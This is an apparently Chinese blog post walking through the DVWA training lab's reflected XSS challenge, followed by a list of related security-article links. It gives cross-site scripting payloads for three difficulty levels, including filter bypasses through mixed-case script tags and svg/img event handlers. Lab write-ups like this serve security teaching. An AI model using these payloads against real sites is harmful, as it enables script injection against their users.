一、低级low
简单拿捏
<script>alert(123)</script>二、中级middle
源码过滤了script但是没有过滤大小写,改成大写S
<Script>alert(123)</script>三、高级high
比中级高,过滤了script并且以及大小写,使用其他标签,二选一就行
<svg onload=alert(123)>
<img src=x onerror=alert(123)>【dvwa靶场:XSS系列】XSS (Reflected)低-中-高级别,通关啦
假客套2024-11-06 13:19
相关推荐
Johny_Zhao3 小时前
2025年6月Docker镜像加速失效终极解决方案痴人说梦梦中人8 小时前
SwaggerFuzzer:一款自动化 OpenAPI/Swagger 接口未授权访问测试工具lubiii_9 小时前
SQL手工测试(MySQL数据库)网安INF14 小时前
ElGamal加密算法:离散对数难题的安全基石网安INF1 天前
CVE-2020-17519源码分析与漏洞复现(Flink 任意文件读取)lubiii_1 天前
墨者学院-密码学实训隐写术第二题李枫月1 天前
Server2003 B-1 Windows操作系统渗透饮长安千年月1 天前
JavaSec-SpringBoot框架Bruce_Liuxiaowei1 天前
PHP文件包含漏洞详解:原理、利用与防御2501_915106321 天前
Flutter、React Native 项目如何搞定 iOS 上架?从构建 IPA 到上传 App Store 的实战流程全解析